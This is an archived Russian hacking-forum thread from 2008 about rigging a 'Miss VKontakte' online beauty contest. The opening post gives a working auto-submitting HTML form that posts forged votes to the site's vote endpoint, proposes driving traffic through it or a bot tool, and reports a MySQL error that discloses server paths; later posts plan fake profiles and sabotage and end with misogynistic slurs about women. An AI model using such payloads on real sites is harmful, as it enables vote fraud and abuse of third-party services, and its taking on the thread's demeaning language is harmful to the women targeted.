PDA

Просмотр полной версии : Мисс Вконтакте 2008 xD

T-Rey
16.08.2008, 06:44
Ходя по интернету наткнулся на сайт http://missvkontakte.com/

Цель его такова:
Девушки регистрируются
За них голосуют
И сами призы
1-место Приз: 300 000 рублей.
2-место Приз: 100 000 рублей.
3-место Приз: 50 000 рублей.

Голоса можно было отправить несколькими способами:
1 голос бесплатно (по ip каждые пол часа)
10 голосов СМС
100 голосов СМС

Ну покопавшись в сорцах сайта обнорушил, что +1 добавляется обычным post запросом (хоть бы капчу прикрутили :D )

И был написан iframe
<html>
<body>
<form name=MyForm action="http://missvkontakte.com/simplevoice.php" method=POST>
<input type=hidden name="id_miss" value="Номер учасницы">
</form>
<script>
document.MyForm.submit();
</script>
</body>
</html>

Следовательно сливаем на него трафф и голоса летят) или крути пост через ТОПген

Так же заметил ошибку мускула где раскрытие путей:
Warning: mysql_fetch_array(): supplied argument is
not a valid MySQL result resource in /www/missvkon/www/htdocs/index.php on line 261


Есть идеи? Что ещё можно найти тут?



P.S. Сайт ну никак не соответствует призовой сумме :rolleyes:



Благодарю комрада mr.The за помощь оказанную мне в поиске уязвимостей сайта.
GrAmOzEkA
16.08.2008, 07:44
имхо, помоему лажа полная, можно конечно накрутить голосов понравившейся телке :), или создать фейковую анкету и накрутить себе ;), только есть один вопрос, а не кидалово ли этот сайт.
T-Rey
16.08.2008, 07:59
Вот у меня точно такие же сомнения.
Хотят срубить на смс.

Акция до декабря, вполне реально, что приз будет.
Призовой фонд 450 тонн... они на той же рекламе и смс за это время в раза 4 больше получат.
KaZ@NoVa
16.08.2008, 08:46
Вот у меня точно такие же сомнения.
Хотят срубить на смс.

Акция до декабря, вполне реально, что приз будет.
Призовой фонд 450 тонн... они на той же рекламе и смс за это время в раза 4 больше получат.

:d) Согласен!!!)) :D
T-Rey
16.08.2008, 11:53
Никаких уязвимостей больше не обнаружено.
Кроме конечно того факта, при накрутки участници её банят :-l
Так диверсию устроить можно.
born2flood
16.08.2008, 11:57
в бан всех!
Midas
16.08.2008, 12:01
а можно ради проверки действительно создать фэйковую анкету и накрутить её на максимум. Посмотрим на реакцию администрации :)
born2flood
16.08.2008, 12:02
http://vkontakte.ru/id16557956
действуйте, воены!
T-Rey
17.08.2008, 17:37
http://vkontakte.ru/id16557956
действуйте, воены!
Удалили.

Катю Пушкарёву в лидеры! :D


Нужен iframe траффик.
T-Rey
17.08.2008, 19:02
http://vkontakte.ru/club3621274

Я плакатъ =))
Андрюша
17.08.2008, 19:04
спс подрачил
Ch3ck
17.08.2008, 19:18
Все сучки такие... мням.
Chode
18.08.2008, 01:14
как и везде, сучки есть сучки =)